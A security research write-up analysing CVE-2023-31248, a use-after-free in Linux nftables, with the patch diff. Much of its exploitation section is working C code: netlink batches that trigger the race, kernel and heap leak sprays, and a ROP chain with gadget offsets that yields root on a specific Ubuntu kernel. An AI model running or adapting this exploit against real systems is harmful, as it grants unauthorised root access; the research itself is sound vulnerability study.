nftables Adventures: CVE-2023-31248 -- Oh How The Turn Tables! [Part 2] - Thu, Sep 28, 2023
TLDR
CVE-2023-31248 is an n-day bug affecting nftables reported by Mingi Cho. The bug report and patch can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=515ad530795c118f012539ed76d02bacfd426d89. Linux kernel versions before 6.2.0-26 generic are vulnerable to this bug. My exploit has been tested on Ubuntu 23.04 (Lunar Lobster), with kernel version 6.2.0-20 generic.
The official version of this writeup can be found at this link: https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation/
nfTable of Contents
- Vulnerability Analysis
- Triggering the Bug
- Obtaining a Use-After-Free
- Obtaining a Kernel Text Leak
- Obtaining a Heap Leak
- Controlling RIP
- Patch Analysis
- Exploit Demo
- Acknowledgements
- References and Credits
Vulnerability Analysis
nft_chain_lookup_byid
does not check whether a chain is active (by checking the genmask) when looking up a chain, as seen in the code below:
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
const struct nlattr *nla)
{
struct nftables_pernet *nft_net = nft_pernet(net);
u32 id = ntohl(nla_get_be32(nla));
struct nft_trans *trans;
list_for_each_entry(trans, &nft_net->commit_list, list) {
struct nft_chain *chain = trans->ctx.chain;
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
id == nft_trans_chain_id(trans))
return chain;
}
return ERR_PTR(-ENOENT);
}
When adding a rule to a chain referring to its ID, if that chain had been deleted on the same batch, it is possible to refer to an inactive chain. Rule addition will fail immediately afterwards due to the value of chain->use not being 0, resulting in a warning being displayed.
Triggering the bug with a single batch transaction
To trigger the bug, a batch transaction can be sent comprising of the following steps:
- Create a new table “table1” (
NFT_MSG_NEWTABLE
) - Create a new chain “chain1” (
NFT_MSG_NEWCHAIN
) - Delete “chain1” (
NFT_MSG_DELCHAIN
) - Create a new chain “chain2” (
NFT_MSG_NEWCHAIN
) - Create a rule inside chain2 referencing chain1. This can be done with a jump or goto expression with the destination chain set to chain1’s chain ID. (
NFT_MSG_NEWRULE
)
When the new rule is created, the following code path is taken such that the value of chain->use for the destination chain (chain1) is incremented from 0 to 1. This is due to the fact that a new reference to chain1 is created.
nf_tables_newrule
-> nf_tables_newexpr
-> nft_immediate_init
-> nft_data_init
-> nft_verdict_init
As all the actions in the batch transaction are determined to be valid, the batch transaction succeeds. When a valid batch transaction succeeds, nfnetlink_rcv_batch
calls the commit operation for nf_tables_subsys
, which is nf_tables_commit
.
Note that the struct nft_chain chain1
object is not immediately deleted when NFT_MSG_DELCHAIN
is received. For each action, a transaction is added to the list, and all the transactions are processed when commit is called. Destruction of deleted objects is then scheduled, and performed by a worker thread asynchronously. The following code path is then taken to destroy and free the chain1 object, which has been marked as inactive:
nf_tables_commit
-> nf_tables_commit_release
-> nf_tables_trans_destroy_work
-> nft_commit_release
-> nf_tables_chain_destroy
However, in this case, when nf_tables_chain_destroy
is reached, chain1 is not freed and a warning is displayed. This is because chain1’s chain->use is 1 and not 0 ([6]).
void nf_tables_chain_destroy(struct nft_ctx *ctx)
{
struct nft_chain *chain = ctx->chain;
struct nft_hook *hook, *next;
if (WARN_ON(chain->use > 0)) <-- [6]
return;
/* no concurrent access possible anymore */
nf_tables_chain_free_chain_rules(chain);
if (nft_is_base_chain(chain)) {
struct nft_base_chain *basechain = nft_base_chain(chain);
if (nft_base_chain_netdev(ctx->family, basechain->ops.hooknum)) {
list_for_each_entry_safe(hook, next,
&basechain->hook_list, list) {
list_del_rcu(&hook->list);
kfree_rcu(hook, rcu);
}
}
module_put(basechain->type->owner);
if (rcu_access_pointer(basechain->stats)) {
static_branch_dec(&nft_counters_enabled);
free_percpu(rcu_dereference_raw(basechain->stats));
}
kfree(chain->name);
kfree(chain->udata);
kfree(basechain);
} else {
kfree(chain->name);
kfree(chain->udata);
kfree(chain);
}
}
Exploitation
Obtaining a Use-After-Free
The first step to writing a successful privilege escalation exploit is obtaining a use-after-free primitive. Essentially, we need to find a way to decrease chain->use of the deleted chain to 0 so that when nf_tables_chain_destroy
is called, the chain object is freed. This can be done via exploiting the race condition between the control plane (nf_tables_delrule
) and the transaction worker (nf_tables_trans_destroy_work
).
In order to do this, 2 batch transactions were sent. In the first batch transaction, the following actions were performed:
- Create a new table “test_table” (
NFT_MSG_NEWTABLE
) - Create a new chain “chain1” with name “AAAAAAAAAAAAAAAAAAAA” (
NFT_MSG_NEWCHAIN
). The name of the chain is 20 characters long. This is the chain to be deleted. - Delete chain 1 (
NFT_MSG_DELCHAIN
) - Create a new chain “chain2” (
NFT_MSG_NEWCHAIN
) - Create a rule inside “chain2” referencing chain 1 with name “AAAAAAAAAAAAAAAAAAAA”. In the exploit, this was done with an immediate “goto” expression with the destination chain set to the target chain using the chain ID.
// Start nl message 1
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Create table
struct nftnl_table *t = build_table(table_name, NFPROTO_IPV4);
family = nftnl_table_get_u32(t, NFTNL_TABLE_FAMILY);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, t);
nftnl_table_free(t);
mnl_nlmsg_batch_next(batch);
// Create chain 1
struct nftnl_chain *c = build_chain(table_name, chain_name, NULL, 0x1234);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
mnl_nlmsg_batch_next(batch);
// Delete chain 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
nftnl_chain_free(c);
mnl_nlmsg_batch_next(batch);
// Create chain 2
struct nftnl_chain *c2 = build_chain(table_name, "chain2", &bp, 10);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c2);
nftnl_chain_free(c2);
mnl_nlmsg_batch_next(batch);
// Create rule pointing to chain 1
struct nftnl_rule *r = build_rule(table_name, "chain2", family, NULL);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
// Add immediate expr to rule
struct nftnl_expr *e = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_CHAIN_ID, 0x1234);
nftnl_rule_add_expr(r, e);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message
printf("[+] Sending netlink message 1\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As all the actions in the first batch transaction are valid, commit is called, and the transaction worker which destroys inactive objects is scheduled.
The second batch transaction consists of the following operations:
- Delete the rule referencing the target chain (
NFT_MSG_DELRULE
) - Create an invalid rule. In this case, audit_info->type can take values ranging from 0 to 2 inclusive, so 0xff is an invalid value which will cause the batch to fail. [7]
// Start nl message 2
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Delete rule 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
// Fail the batch using a invalid rule
struct nftnl_rule *r2 = nftnl_rule_alloc();
nftnl_rule_set_u32(r2, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(r2, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(r2, NFTNL_RULE_CHAIN, "chain2");
struct xt_audit_info *audit_info;
audit_info = malloc(sizeof(struct xt_audit_info));
audit_info->type = 0xff; <-- [7]
struct nftnl_expr *e2 = nftnl_expr_alloc("target");
nftnl_expr_set_str(e2, NFTNL_EXPR_TG_NAME, "AUDIT");
nftnl_expr_set_u32(e2, NFTNL_EXPR_TG_REV, 0);
nftnl_expr_set_data(e2, NFTNL_EXPR_TG_INFO, audit_info, sizeof(struct xt_audit_info));
nftnl_rule_add_expr(r2, e2);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r2);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message 2
printf("[+] Sending netlink message 2\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As the second batch transaction fails, commit will not be called. However, nftables netlink messages were still passed to nftables, and operations in the control plane will still be performed (they will be aborted at the very end when the batch transaction fails).
As NFT_MSG_DELRULE
was passed to nftables, the following code path is taken:
nf_tables_delrule
-> nft_delrule_by_chain
-> nft_delrule
-> nft_rule_expr_deactivate
-> nft_immediate_deactivate
-> nft_data_release
-> nft_verdict_uninit
Specifically, in nft_verdict_uninit
, chain->use of the referenced chain (which in this case would be our target chain “AAAAAAAAAAAAAAAAAAAA”) will be decremented from 1 to 0.
static void nft_verdict_uninit(const struct nft_data *data)
{
struct nft_chain *chain;
struct nft_rule *rule;
switch (data->verdict.code) {
case NFT_JUMP:
case NFT_GOTO:
chain = data->verdict.chain;
chain->use--;
...
Essentially, chain->use of the target chain must be decremented to 0 before the transaction worker nf_tables_trans_destroy_work
runs, and the transaction worker must run before the failed batch transaction is aborted.
If the rule is marked for deletion before nf_tables_chain_destroy
is called, chain->use of the target chain will be 0 when the chain is destroyed, allowing the chain to be freed. As seen in the function code previously, the chain is freed in the order chain->name
, chain->udata
, and chain
. The struct nft_chain
object has been freed, but we still have a reference to the freed chain via the rule (which is not actually deleted because the second transaction fails), resulting in a use-after-free. The space where chain, chain->name and chain->udata originally was can now be reclaimed with another object to aid us in our exploitation.
Obtaining a kernel text leak
Before going into how to obtain a leak, it is important to understand how and where the chain, chain->udata and chain->name objects are allocated.
The struct nft_chain
object is allocated when nftables receives a NFT_MSG_NEWCHAIN
message. In the control plane, nf_tables_newchain
calls nf_tables_addchain
, which allocates the new chain object in the kmalloc-cg-128
cache. chain->udata and chain->name are allocated in their respective kmalloc-cg
caches by nla_memdup
and nla_strdup
respectively.
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
u8 policy, u32 flags,
struct netlink_ext_ack *extack)
{
...
chain = kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT);
if (chain == NULL)
return -ENOMEM;
...
if (nla[NFTA_CHAIN_NAME]) {
chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL_ACCOUNT);
} else {
if (!(flags & NFT_CHAIN_BINDING)) {
err = -EINVAL;
goto err_destroy_chain;
}
snprintf(name, sizeof(name), "__chain%llu", ++chain_id);
chain->name = kstrdup(name, GFP_KERNEL_ACCOUNT);
}
...
if (nla[NFTA_CHAIN_USERDATA]) {
chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
if (chain->udata == NULL) {
err = -ENOMEM;
goto err_destroy_chain;
}
chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);
}
It is possible to leak data via reading from chain->name. However, as chain->name is treated as a string, it is only possible to print data up to a null byte.
To obtain a kernel text leak, struct seq_operations
was chosen as the spray object. In kernel version 6.2.0, struct seq_operations
is allocated in the kmalloc-cg-32
cache by the function single_open
in fs/seq_file.c. This object is perfect for leaking as it contains a pointer to a kernel text pointer (the single_start
function).
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
struct seq_operations
was sprayed to reclaim the freed space originally occupied by chain->name [8]. chain->name was then read to obtain a text leak, which can be used to calculate the kernel base [9].
// Spray seq_operations to fill up kmalloc-cg-32 (chain->name)
printf("[+] Spray seq_operations to fill up kmalloc-cg-32 chain->name\n");
for (int i = 0; i < NUM_SEQOPS; i++) {
seqops[i] = open("/proc/self/stat", O_RDONLY); <-- [8]
if (seqops[i] < 0) {
perror("[!] open");
exit(-1);
}
}
// Get kernel text address leak of single_start and calculate kbase
char kbase_leak[0x10+1];
uint64_t k_single_start = 0; // 0x4b2470 offset
uint64_t kbase = 0;
int err = 0;
printf("[+] Getting leak\n");
// Leak
struct nftnl_rule *rleak = nftnl_rule_alloc();
nftnl_rule_set_u32(rleak, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(rleak, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(rleak, NFTNL_RULE_CHAIN, "chain2");
rseq = seq;
nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, NFPROTO_IPV4, NLM_F_DUMP, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rleak);
mnl_socket_sendto(nl, buf, nlh->nlmsg_len);
while (rseq < seq) {
err = mnl_socket_recvfrom(nl, buf, sizeof(buf));
err = mnl_cb_run(buf, err, rseq, mnl_socket_get_portid(nl), leak_cb, leak_expr_cb);
rseq += err == 0;
}
nftnl_rule_free(rleak);
kbase = number - 0x4b2470; <-- [9]
printf("[+] Kernel base: 0x%llx\n", kbase);
Obtaining a heap leak
Ideally, to have enough space for our fake struct nft_rule
, struct nft_expr
and struct nft_expr_ops
, we would like to have a kmalloc-cg-1024 heap leak (where we can allocate the struct msg_msg
which contains all our fake objects). However, kmalloc-cg-1024 addresses will always end with a null byte, hence preventing us from directly printing the address via chain->name.
In order to circumvent this limitation, we will spray struct msg_msg
in the following way as shown below (prev pointers are omitted for simplicity):
In a single message queue, there will be:
- Primary message (size 64) – this will reclaim the free space where chain->name originally was
- Secondary message (size 96)
- Third message (size 1024)
We will first attempt to leak a kmalloc-cg-96
pointer via the UAF read from the freed chain. chain->name would point to the next pointer of the primary message, which would be the address of the secondary message. A size of 96 bytes was chosen as since kmalloc-cg-96
cache objects are small, there is a much lower probability that the last byte of the address would be 0x0 and cause our leak to truncate and fail.
After obtaining a valid kmalloc-cg-96
heap pointer, we now want to leak the kmalloc-cg-1024
heap pointer. The next pointer of the secondary message points to the third message, which is allocated in kmalloc-cg-1024
. We also know that the struct nft_chain
object (which is now freed) was allocated in kmalloc-cg-128
. To obtain the leak, we spray a fourth message of size 128 into the space of the freed chain object, and set the fake chain->name to the address of the kmalloc-cg-96
pointer + 1 to bypass the null byte. This is shown in the diagram below:
We can now read from chain->name to obtain a kmalloc-cg-1024
pointer.
Controlling RIP
When a new rule is added to a base chain, the following functions are called to ensure that the ruleset will not result in any loops:
nf_tables_newrule
-> nft_table_validate
-> nft_chain_validate
-> expr->ops->validate
When nft_chain_validate
is called, the expressions from the rules in the chain will be validated. nftables will use struct list_head rules
in the nft_chain
structure to determine what rules belong to the chain. However, we are able to control the space previously occupied by the freed target chain. This means that if we create a fake rule, with a fake expression and fake expression ops pointing to our ROP chain, and then spray a fake chain to reclaim the space of the freed target chain, and finally add a new rule to a base chain, we are able to kick off this chain of functions that will allow us to control RIP.
We first free the third message (size 1024) and the fourth message (size 128) which was used to leak the heap pointer. We then construct a fake rule, fake expression, fake expression ops and ROP chain in the data section of a struct msg_msg
and spray that as our third message. The fake structures and ROP chain can be seen below:
// Do all the ROP stuff in kmalloc-cg-1024
printf("[+] PHASE 3: ROP\n");
uint64_t fake_rule_addr = kheap_1024 + 0x230;
printf("[+] Fake rule address: 0x%llx\n", fake_rule_addr);
uint64_t fake_expr_addr = kheap_1024 + 0x260;
printf("[+] Fake expr ops: 0x%llx\n", fake_expr_addr);
// Make a fake rule
memset(&msg_three, 0, sizeof(msg_three));
*(long *)&msg_three.mtype = 0x43;
*(uint8_t *)&msg_three.mtext[0x215] = 0x10;
*(long *)&msg_three.mtext[0x218] = fake_expr_addr;
*(long *)&msg_three.mtext[0x278] = kbase + 0xba612a; // First rop point
// 0xffffffff81ba612a : push rsi ; jmp qword ptr [rsi - 0x7f]
// ROP!!!
*(long *)&msg_three.mtext[0x199] = kbase + 0xd58be; // Second rop point
// 0xffffffff810d58be : pop rsp ; pop r15 ; ret
*(long *)&msg_three.mtext[0x220] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x228] = kbase + 0x2a1b600; // init_task
*(long *)&msg_three.mtext[0x230] = kbase + 0x126bc0; // prepare_kernel_cred()
*(long *)&msg_three.mtext[0x238] = kbase + 0xcb0f92; // pop rsi ; ret
// 0xffffffff81cb0f92 : pop rsi ; ret 0
*(long *)&msg_three.mtext[0x240] = kheap_1024 + 0x3a0 + 48 + 0x70; // rsi
*(long *)&msg_three.mtext[0x248] = kbase + 0xd287b6;
// 0xffffffff81d287b6 : push rax ; jmp qword ptr [rsi - 0x70]
// Jump point after push rax
*(long *)&msg_three.mtext[0x3a0] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x250] = kbase + 0x1268e0; // commit_creds()
*(long *)&msg_three.mtext[0x258] = kbase + 0xad163; // 4 pop
*(long *)&msg_three.mtext[0x280] = kbase + 0x12011cb; // swapgs, iretq
*(long *)&msg_three.mtext[0x288] = user_rip;
*(long *)&msg_three.mtext[0x290] = user_cs;
*(long *)&msg_three.mtext[0x298] = user_rflags;
*(long *)&msg_three.mtext[0x2a0] = user_sp;
*(long *)&msg_three.mtext[0x2a8] = user_ss;
// Spray msg_msg of size 1024
for (int i = 0; i < NUM_MSQIDS; i++) {
if (msgsnd(msqid[i], &msg_three, sizeof(msg_three) - sizeof(long), 0) < 0) {
perror("[!] msg_msg spray failed");
exit(-1);
}
}
We then spray a fourth struct msg_msg
which will act as our fake chain. Shown below is a summary of the objects involved:
To kick off the ROP chain, simply add a new rule to the previously created base chain “chain2”, and enjoy your root shell!
As before, if you would like a graphical representation of the entire exploit chain, check out these slides:
Patch Analysis
To patch the bug, simply check the genmask when looking up a chain by its ID.
net/netfilter/nf_tables_api.c | 11 +++++++----
1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2694,7 +2694,7 @@ static int nf_tables_updchain(struct nft_ctx *ctx, u8 genmask, u8 policy,
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
- const struct nlattr *nla)
+ const struct nlattr *nla, u8 genmask)
{
struct nftables_pernet *nft_net = nft_pernet(net);
u32 id = ntohl(nla_get_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
- id == nft_trans_chain_id(trans))
+ id == nft_trans_chain_id(trans) &&
+ nft_active_genmask(chain, genmask))
return chain;
}
return ERR_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
return -EOPNOTSUPP;
} else if (nla[NFTA_RULE_CHAIN_ID]) {
- chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
+ chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+ genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
genmask);
} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
chain = nft_chain_lookup_byid(ctx->net, ctx->table,
- tb[NFTA_VERDICT_CHAIN_ID]);
+ tb[NFTA_VERDICT_CHAIN_ID],
+ genmask);
if (IS_ERR(chain))
return PTR_ERR(chain);
} else {
Exploit Demo
Here is a demonstration of the exploit in action:
The exploit script can be obtained here.
Acknowledgements
I would like to thank my mentor Billy for teaching me so many cool techniques and guiding me, Jacob for giving me this internship opportunity, and everyone else at Star Labs! :D
References and Credits
- Mingi Cho of Theori for reporting CVE-2023-31248
- David Bouman for his article on nftables and for the helper library functions https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/
- Bien Pham for stabilizing the race condition with audit and for the validate ops idea https://github.com/kungfulon/nf-tables-lpe/tree/master/chain-active
- Elixir Bootlin for the kernel source code https://elixir.bootlin.com/linux/v6.2/source/net/netfilter/nf_tables_api.c
- Andy Nguyen for msg_msg tricks https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html